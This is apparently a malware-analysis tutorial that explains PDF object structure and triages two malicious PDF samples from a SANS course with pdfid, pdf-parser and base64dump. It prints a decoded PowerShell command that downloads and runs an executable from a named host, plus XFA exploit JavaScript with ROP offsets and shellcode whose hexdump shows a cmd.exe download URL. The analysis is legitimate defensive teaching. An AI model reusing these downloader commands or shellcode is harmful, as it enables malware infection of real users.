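A PDF is a collection of elements (objects). The file starts with a header that declares the PDF version, for example:
%PDF-1.6
Each indirect object is wrapped like this:
X Y obj
...
endobj
// X is the object number
// Y is the generation (version) number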
Below is an example of an indirect object:
1 0 obj
<<
/Type /Page
/AA << /O 43 0 R >>
>>
endobj
/AA stands for Additional Actions, and inside a page object /O means "when the page is opened" (for the first page, that is effectively when the document is opened). This directs the PDF reader to perform an automatic action, stored in object #43, generation 0, as soon as the page opens. The R at the end is what makes 43 0 a reference to the indirect object #43/0.
/OpenAction is similar to /AA /O: it sits in the document catalog and specifies an action (or a destination) to run when the file is opened.
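To see how these pieces look in raw bytes, here is a rough Python sketch (my own, not part of pdfid or pdf-parser) that lists every X Y obj header and every X Y R reference with regular expressions. It assumes an uncompressed, unencrypted file and ignores objects hidden inside object streams, so treat it as a toy.

```python
import re

# "X Y obj" opens an indirect object; "X Y R" is a reference to one.
OBJ_HEADER = re.compile(rb"(\d+)\s+(\d+)\s+obj\b")
OBJ_REF = re.compile(rb"(\d+)\s+(\d+)\s+R\b")

def list_objects(data: bytes) -> list[tuple[int, int]]:
    """Return (object number, generation number) for every 'X Y obj' header."""
    return [(int(num), int(gen)) for num, gen in OBJ_HEADER.findall(data)]

def list_references(data: bytes) -> list[tuple[int, int]]:
    """Return (object number, generation number) for every 'X Y R' reference."""
    return [(int(num), int(gen)) for num, gen in OBJ_REF.findall(data)]

sample = b"1 0 obj\n<<\n/Type /Page\n/AA << /O 43 0 R >>\n>>\nendobj\n"
print(list_objects(sample))     # [(1, 0)]
print(list_references(sample))  # [(43, 0)]
```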
Many malicious PDFs contain a JavaScript stream that loads shellcode, sprays the heap with it and then exploits a PDF reader vulnerability. If you encounter shellcode in a JS script, it's most probably encoded as Unicode escapes (%uXXXX or \uXXXX). Use base64dump.py -e pu (for %u escapes) or -e bu (for \u escapes) to extract it in a sexy, raw binary format.
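The idea behind that extraction is simple: every 16-bit escape becomes two bytes, low byte first, because that is how x86 lays the string out in memory. A minimal Python sketch of the idea (an illustration, not base64dump.py's actual code):

```python
import re

# Matches %uXXXX (unescape()-style) and \uXXXX (string-literal-style) escapes.
UNICODE_ESCAPE = re.compile(r"(?:%u|\\u)([0-9a-fA-F]{4})")

def unicode_escapes_to_bytes(text: str) -> bytes:
    """Convert each 16-bit escape into two little-endian bytes."""
    out = bytearray()
    for hex_word in UNICODE_ESCAPE.findall(text):
        out += int(hex_word, 16).to_bytes(2, "little")
    return bytes(out)

print(unicode_escapes_to_bytes(r"\u9090\u77eb\uc931").hex())  # 9090eb7731c9
```

The same eb 77 31 c9 bytes show up right after the NOPs in the hexdump of the page.pdf shellcode.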
This example was taken from the SANS FOR610 course.
Running pdfid yields the following:
$ pdfid ctk.pdf
PDFiD 0.2.1 ctk.pdf
PDF Header: %PDF-1.1
obj 5
endobj 5
stream 1
endstream 0
xref 1
trailer 1
startxref 1
/Page 1
/Encrypt 0
/ObjStm 0
/JS 0
/JavaScript 0
/AA 0
/OpenAction 1
/AcroForm 0
/JBIG2Decode 0
/RichMedia 0
/Launch 1
/EmbeddedFile 0
/XFA 0
/Colors > 2^24 0
The result above shows one /OpenAction element and one /Launch element. /OpenAction means something executes as soon as the PDF document is opened, and /Launch is an action that can start an external application. That combination should already raise a red flag.
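Under the hood, pdfid is essentially counting PDF name keywords. A simplified Python sketch of that triage idea follows; it is not pdfid's code, the keyword list is a hypothetical subset, and unlike pdfid it does not catch obfuscated names such as /J#61vaScript.

```python
import re

# Hypothetical subset of the names pdfid reports.
KEYWORDS = ["/JS", "/JavaScript", "/AA", "/OpenAction", "/AcroForm",
            "/Launch", "/EmbeddedFile", "/XFA"]

def count_keywords(data: bytes) -> dict[str, int]:
    """Count each PDF name, requiring that no further name characters follow it."""
    counts = {}
    for keyword in KEYWORDS:
        pattern = re.escape(keyword.encode("ascii")) + rb"(?![A-Za-z0-9])"
        counts[keyword] = len(re.findall(pattern, data))
    return counts

catalog = b"<< /OpenAction << /S /Launch /Win << /F (powershell.exe) >> >> >>"
for name, count in count_keywords(catalog).items():
    print(f"{name:<14} {count}")
```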
Below is the output of pdf-parser:
PDF Comment '%PDF-1.1\r\n'
obj 1 0
Type: /Catalog
Referencing: 2 0 R
<<
/OpenAction
<<
/S /Launch
/Win
<<
/F '(C:\\\\WINDOWS\\\\system32\\\\WindowsPowerShell\\\\v1.0\\\\powershell.exe)'
/P (powershell.exe -EncodedCommand UABvAHcAZQByAFMAaABlAGwAbAAgAC0ARQB4AGUAYwB1AHQAaQBvAG4AUABvAGwAaQBjAHkAIABiAHkAcABhAHMAcwAgAC0AbgBvAHAAcgBvAGYAaQBsAGUAIAAtAHcAaQBuAGQAbwB3AHMAdAB5AGwAZQAgAGgAaQBkAGQAZQBuACAALQBjAG8AbQBtAGEAbgBkACAAKABOAGUAdwAtAE8AYgBqAGUAYwB0ACAAUwB5AHMAdABlAG0ALgBOAGUAdAAuAFcAZQBiAEMAbABpAGUAbgB0ACkALgBEAG8AdwBuAGwAbwBhAGQARgBpAGwAZQAoACcAaAB0AHQAcAA6AC8ALwBuAGMAZAB1AGcAYQBuAGQAYQAuAG8AcgBnAC8ALgBjAHMAcwAvAGEAdwBvAHIAaQAuAGUAeABlACcALAAdICQAZQBuAHYAOgBBAFAAUABEAEEAVABBAFwAYQB3AG8AcgBpAC4AZQB4AGUAHSApADsAUwB0AGEAcgB0AC0AUAByAG8AYwBlAHMAcwAgACgAHSAkAGUAbgB2ADoAQQBQAFAARABBAFQAQQBcAGEAdwBvAHIAaQAuAGUAeABlAB0gKQA= -windowstyle hidden)
>>
>>
/Pages 2 0 R
/Type /Catalog
>>
...
...
...
trailer
<<
/Size 6
/Root 1 0 R
/ID [(bc38735adadf7620b13216ff40de2b26)(bc38735adadf7620b13216ff40de2b26)]
>>
Let’s break it down: the first element is the header we mentioned before, and the last element is the trailer. The trailer is quite important: /Size gives the number of entries in the cross-reference table (one more than the highest object number), and /Root points to the document catalog, the object a reader starts from when it opens the document. Above, the /Root entry references 1 0 R, the first object in the document.
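Since everything starts at the trailer, it is handy to pull /Size and /Root out programmatically. A small Python sketch, assuming a classic plain-text trailer (PDF 1.5+ files may keep this information in a cross-reference stream instead):

```python
import re

def parse_trailer(trailer: str) -> dict:
    """Extract /Size and the /Root reference from a plain-text trailer dictionary."""
    size = re.search(r"/Size\s+(\d+)", trailer)
    root = re.search(r"/Root\s+(\d+)\s+(\d+)\s+R", trailer)
    return {
        "size": int(size.group(1)) if size else None,
        "root": (int(root.group(1)), int(root.group(2))) if root else None,
    }

trailer = "<<\n/Size 6\n/Root 1 0 R\n>>"
print(parse_trailer(trailer))  # {'size': 6, 'root': (1, 0)}
```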
obj 1 0 contains an /OpenAction dictionary whose action type is /S /Launch. Its /Win entry holds Windows-specific launch parameters: /F names the program to run (powershell.exe) and /P holds the arguments passed to it. The argument to -EncodedCommand is Base64-encoded UTF-16LE text. Decoding it yields the following:
PowerShell -ExecutionPolicy bypass -noprofile -windowstyle hidden -command (New-Object System.Net.WebClient).DownloadFile('http://ncduganda.org/.css/awori.exe',”$env:APPDATA\awori.exe”);Start-Process (”$env:APPDATA\awori.exe”)
Looks like our PDF will download awori.exe into %APPDATA% and launch it. Fun!!
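You don't need a special tool for that decoding step: PowerShell's -EncodedCommand expects Base64 of UTF-16LE text, so Python's standard library is enough. A minimal sketch (the helper names are my own):

```python
import base64

def decode_encoded_command(blob: str) -> str:
    """Reverse PowerShell's -EncodedCommand: Base64 -> UTF-16LE bytes -> text."""
    return base64.b64decode(blob).decode("utf-16-le")

def encode_command(command: str) -> str:
    """Produce an -EncodedCommand argument, handy for testing the decoder."""
    return base64.b64encode(command.encode("utf-16-le")).decode("ascii")

# The first 24 Base64 characters of the blob in /P decode to "PowerShel".
print(decode_encoded_command("UABvAHcAZQByAFMAaABlAGwA"))  # PowerShel
```

Paste the whole string after -EncodedCommand into decode_encoded_command() to recover the full command shown above.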
This malware sample was provided by SANS FOR610.
The following sample is named page.pdf:
$ pdfid page.pdf
PDFiD 0.2.1 page.pdf
PDF Header: %PDF-1.5
obj 6
endobj 6
stream 2
endstream 2
xref 1
trailer 1
startxref 1
/Page 1
/Encrypt 0
/ObjStm 0
/JS 0
/JavaScript 0
/AA 0
/OpenAction 0
/AcroForm 1
/JBIG2Decode 0
/RichMedia 0
/Launch 0
/EmbeddedFile 0
/XFA 1
/Colors > 2^24 0
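We see one /AcroForm object and one /XFA entry. An AcroForm is the document's interactive form dictionary (fillable form fields); its /XFA entry carries an XML Forms Architecture (XFA) form, which can embed JavaScript.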
Examining the document’s trailer with pdf-parser reveals:
trailer
<<
/Root 3 0 R
/Size 7
>>
Examining obj 3 0 reveals:
obj 3 0
Type: /Catalog
Referencing: 4 0 R, 2 0 R
<<
/Extensions
<<
/ADBE
<<
/ExtensionLevel 3
/BaseVersion /1.7
>>
>>
/Pages 4 0 R
/AcroForm 2 0 R
/Type /Catalog
/NeedsRendering true
>>
obj 3 0 references /AcroForm 2 0 R. Examining this AcroForm reveals:
obj 1 0
Type:
Referencing:
Contains stream
<<
/Filter /FlateDecode
/Length 403673
>>
obj 2 0
Type:
Referencing: 1 0 R
<<
/XFA 1 0 R
>>
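obj 1 0 above declares /Filter /FlateDecode, which is plain zlib/deflate compression. For the curious, here is a rough Python sketch that inflates every stream in a raw file. It is an illustration, not how pdf-parser works, and it assumes unencrypted streams with a single Flate filter.

```python
import re
import zlib

# Stream bodies sit between 'stream<EOL>' and 'endstream'; the lookbehind
# skips the 'stream' inside 'endstream'.
STREAM_BODY = re.compile(rb"(?<!end)stream\r?\n(.*?)endstream", re.DOTALL)

def inflate_streams(data: bytes) -> list[bytes]:
    """Return the decompressed contents of every stream that is valid zlib data."""
    results = []
    for body in STREAM_BODY.findall(data):
        try:
            # A decompress object tolerates the EOL that usually precedes 'endstream'.
            results.append(zlib.decompressobj().decompress(body))
        except zlib.error:
            continue  # not Flate-compressed (or damaged): skip it
    return results

sample = (b"1 0 obj\n<< /Filter /FlateDecode >>\nstream\n"
          + zlib.compress(b"<xdp:xdp/>") + b"\nendstream\nendobj\n")
print(inflate_streams(sample))  # [b'<xdp:xdp/>']
```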
obj 2 0 points its /XFA entry at obj 1 0, and obj 1 0 contains a very large (403673-byte) compressed stream. Luckily, pdf-parser can decode /FlateDecode streams with --filter:
$ pdf-parser page.pdf --raw --filter -o 1 | vim -
Vim: Reading from stdin...
<xdp:xdp xmlns:xdp="http://ns.adobe.com/xdp/" timeStamp="2012-11-23T13:41:54Z" uuid="0aa46f9b-2c50-42d4-ab0b-1a1015321da7">
<template xmlns:xfa="http://www.xfa.org/schema/xfa-template/3.1/" xmlns="http://www.xfa.org/schema/xfa-template/3.0/">
<?formServer defaultPDFRenderFormat acrobat9.1static?>
<?formServer allowRenderCaching 0?>
<?formServer formModel both?>
<subform name="form1" layout="tb" locale="en_US" restoreState="auto">
<pageSet>
<pageArea name="Page1" id="Page1">
<contentArea x="0.25in" y="0.25in" w="576pt" h="756pt"/>
<medium stock="default" short="612pt" long="792pt"/>
<?templateDesigner expand 1?>
</pageArea>
<?templateDesigner expand 1?>
</pageSet>
<variables>
<script name="util" contentType="application/x-javascript">
function pack(i){
var low = (i & 0xffff);
var high = ((i>>16) & 0xffff);
return String.fromCharCode(low)+String.fromCharCode(high);
}
function unpackAt(s, pos){
return s.charCodeAt(pos) + (s.charCodeAt(pos+1)<<16);
}
function packs(s){
result = "";
for (i=0;i<s.length;i+=2)
result += String.fromCharCode(s.charCodeAt(i) + (s.charCodeAt(i+1)<<8));
return result;
}
function packh(s){
return String.fromCharCode(parseInt(s.slice(2,4)+s.slice(0,2),16));
}
function packhs(s){
result = "";
for (i=0;i<s.length;i+=4)
result += packh(s.slice(i,i+4));
return result;
}
var _offsets = {"Reader": {
"9.303": {
"acrord32": 0x85,
"rop0": 0x14BA8,
"rop1": 0x1E73AF,
"rop1x": 0x2F12,
"rop2": 0x196774,
"rop3": 0xE475,
"rop3x": 0xE476,
We have a script!! The names sound lovely: pack(), unpackAt(), packs(), packh() and packhs(). Looking a bit deeper, we can see a variable called shellcode that starts with a NOP slide (the run of \u9090):
var shellcode = "\u9090\u9090\u9090\u9090\u9090\u9090\u9090\u9090\u9090\u9090\u9090\u9090\u9090\u9090\u9090\u9090\u77eb\uc931\u8b64\u3071\u768b\u8b0c\u1c76\u5e8b\u8b08\u207e\u368b\u3966\u184f\uf275\u60c3\u6c8b\u2424\u458b\u8b3c\u0554\u0178\u8bea\u184a\u5a8b\u0120\ue3eb\u4934\u348b\u018b\u31ee\u31ff\ufcc0\u84ac\u74c0\uc107\u0dcf\uc701\uf4eb\u7c3b\u2824\ue175\u5a8b\u0124\u66eb\u0c8b\u8b4b\u1c5a\ueb01\u048b\u018b\u89e8\u2444\u611c\ue8c3\uff92\uffff\u815f\u98ef\uffff\uebff\ue805\uffed\uffff\u8e68\u0e4e\u53ec\u94e8\uffff\u31ff\u66c9\u6fb9\u516e\u7568\u6c72\u546d\ud0ff\u3668\u2f1a\u5070\u7ae8\uffff\u31ff\u51c9\u8d51\u8137\ueec6\uffff\u8dff\u0c56\u5752\uff51\u68d0\ufe98\u0e8a\ue853\uff5b\uffff\u5141\uff56\u68d0\ud87e\u73e2\ue853\uff4b\uffff\ud0ff\u6d63\u2e64\u7865\u2065\u632f\u2020\u2e61\u7865\u0065\u7468\u7074\u2f3a\u772f\u7777\u652e\u7078\u6f6c\u7469\u616d\u657a\u632e\u6d6f\u302f\u6131\u696b\u2e6e\u7865\u0065\u9090\u9090\u9090\u9090\u9090\u9090\u9090\u9090\u9090\u9090\u9090\u9090\u9090\u9090\u9090\u9090\u9090\u9090\u9090\u9090\u9090\u9090\u9090\u9090\u9090\u9090\u9090\u9090\u9090\u9090\u9090\u9090\u9090\u9090\u9090\u9090\u9090\u9090\u9090\u9090\u9090\u9090\u9090\u9090\u9090\u9090\u9090\u9090\u9090\u9090\u9090\u9090\u9090\u9090\u9090\u9090\u9090\u9090\u9090\u9090\u9090\u9090\u9090\u9090\u9090\u9090\u9090\u9090\u9090\u9090\u9090\u9090\u9090";
var shellcode2 = shellcode[0] + util.pack((verB << 16) | verA) + shellcode.substring(3);
var add_num = verA >= 11 ? 16 : 14;
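Those helpers exist to smuggle binary values into JavaScript strings. For instance, pack() splits a 32-bit value into two 16-bit characters, low half first, so once the string sits in memory as UTF-16LE the bytes read back as a little-endian DWORD (presumably how the ROP addresses built from the _offsets table get planted). A Python port to illustrate; js_string_to_bytes is a hypothetical helper that assumes the engine stores strings as UTF-16LE:

```python
def pack(i: int) -> str:
    """Python port of the script's pack(): low 16 bits first, then high 16 bits."""
    low = i & 0xFFFF
    high = (i >> 16) & 0xFFFF
    return chr(low) + chr(high)

def js_string_to_bytes(s: str) -> bytes:
    """Hypothetical view of a JS string in memory: each code unit, little-endian."""
    return b"".join(ord(c).to_bytes(2, "little") for c in s)

print(js_string_to_bytes(pack(0x41424344)))  # b'DCBA'
```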
So, we found some shellcode in a bunch of thank-god-it's-not-obfuscated JavaScript inside a PDF. Let’s extract the shellcode and hexdump it to see what we can find.
$ pdf-parser page.pdf --object 1 --filter --raw -d decoded_js.txt
$ base64dump.py -e bu decoded_js.txt
ID Size Encoded Decoded MD5 decoded
-- ---- ------- ------- -----------
1: 900 \u4f4f\u4f4f\u4f OOOOOOOOOOOOOOOO ff23042711ff00cb5aedbf5ccef4df7a
2: 24 \u5858\u5858\u56 XXXXxV4. f3b3858bc27cf47d3c4ed57be1bd127b
3: 6000 \u9090\u9090\u90 c6f73cbc08fa0754df7d1cee089e87ff
4: 6 \u5858 XX c51b57a703ba1c5869228690c93e1701
5: 6 \u0000 .. c4103f122d27677c9db144cae1394a66
6: 6 \u0000 .. c4103f122d27677c9db144cae1394a66
$ base64dump.py -e bu decoded_js.txt -s 3 -d > sc.bin
$ hexdump -C sc.bin
00000000 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 |................|
*
00000020 eb 77 31 c9 64 8b 71 30 8b 76 0c 8b 76 1c 8b 5e |.w1.d.q0.v..v..^|
00000030 08 8b 7e 20 8b 36 66 39 4f 18 75 f2 c3 60 8b 6c |..~ .6f9O.u..`.l|
00000040 24 24 8b 45 3c 8b 54 05 78 01 ea 8b 4a 18 8b 5a |$$.E<.T.x...J..Z|
00000050 20 01 eb e3 34 49 8b 34 8b 01 ee 31 ff 31 c0 fc | ...4I.4...1.1..|
00000060 ac 84 c0 74 07 c1 cf 0d 01 c7 eb f4 3b 7c 24 28 |...t........;|$(|
00000070 75 e1 8b 5a 24 01 eb 66 8b 0c 4b 8b 5a 1c 01 eb |u..Z$..f..K.Z...|
00000080 8b 04 8b 01 e8 89 44 24 1c 61 c3 e8 92 ff ff ff |......D$.a......|
00000090 5f 81 ef 98 ff ff ff eb 05 e8 ed ff ff ff 68 8e |_.............h.|
000000a0 4e 0e ec 53 e8 94 ff ff ff 31 c9 66 b9 6f 6e 51 |N..S.....1.f.onQ|
000000b0 68 75 72 6c 6d 54 ff d0 68 36 1a 2f 70 50 e8 7a |hurlmT..h6./pP.z|
000000c0 ff ff ff 31 c9 51 51 8d 37 81 c6 ee ff ff ff 8d |...1.QQ.7.......|
000000d0 56 0c 52 57 51 ff d0 68 98 fe 8a 0e 53 e8 5b ff |V.RWQ..h....S.[.|
000000e0 ff ff 41 51 56 ff d0 68 7e d8 e2 73 53 e8 4b ff |..AQV..h~..sS.K.|
000000f0 ff ff ff d0 63 6d 64 2e 65 78 65 20 2f 63 20 20 |....cmd.exe /c |
00000100 61 2e 65 78 65 00 68 74 74 70 3a 2f 2f 77 77 77 |a.exe.http://www|
00000110 2e 65 78 70 6c 6f 69 74 6d 61 7a 65 2e 63 6f 6d |.exploitmaze.com|
00000120 2f 30 31 61 6b 69 6e 2e 65 78 65 00 90 90 90 90 |/01akin.exe.....|
00000130 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 |................|
*
000007d0
$
A cursory glance with hexdump -C shows cmd.exe /c a.exe and an HTTP URL (http://www.exploitmaze.com/01akin.exe). Now, we could examine it further with scdbg, or wrap it as an exe and debug it to learn more about the shellcode, but I believe our work here is done.
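That cursory glance is basically what the Unix strings tool does. A tiny Python equivalent to run against sc.bin (the script name strings_sketch.py and the minimum length of 5 are arbitrary choices):

```python
import re
import sys

def ascii_strings(data: bytes, min_len: int = 5) -> list[str]:
    """Return runs of printable ASCII (0x20-0x7e) at least min_len bytes long."""
    pattern = rb"[\x20-\x7e]{%d,}" % min_len
    return [run.decode("ascii") for run in re.findall(pattern, data)]

if __name__ == "__main__" and len(sys.argv) > 1:
    # Usage: python strings_sketch.py sc.bin
    with open(sys.argv[1], "rb") as f:
        for s in ascii_strings(f.read()):
            print(s)
```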
There’s a process for examining malicious documents. Lenny Zeltser from SANS FOR610 describes the following:
Till next time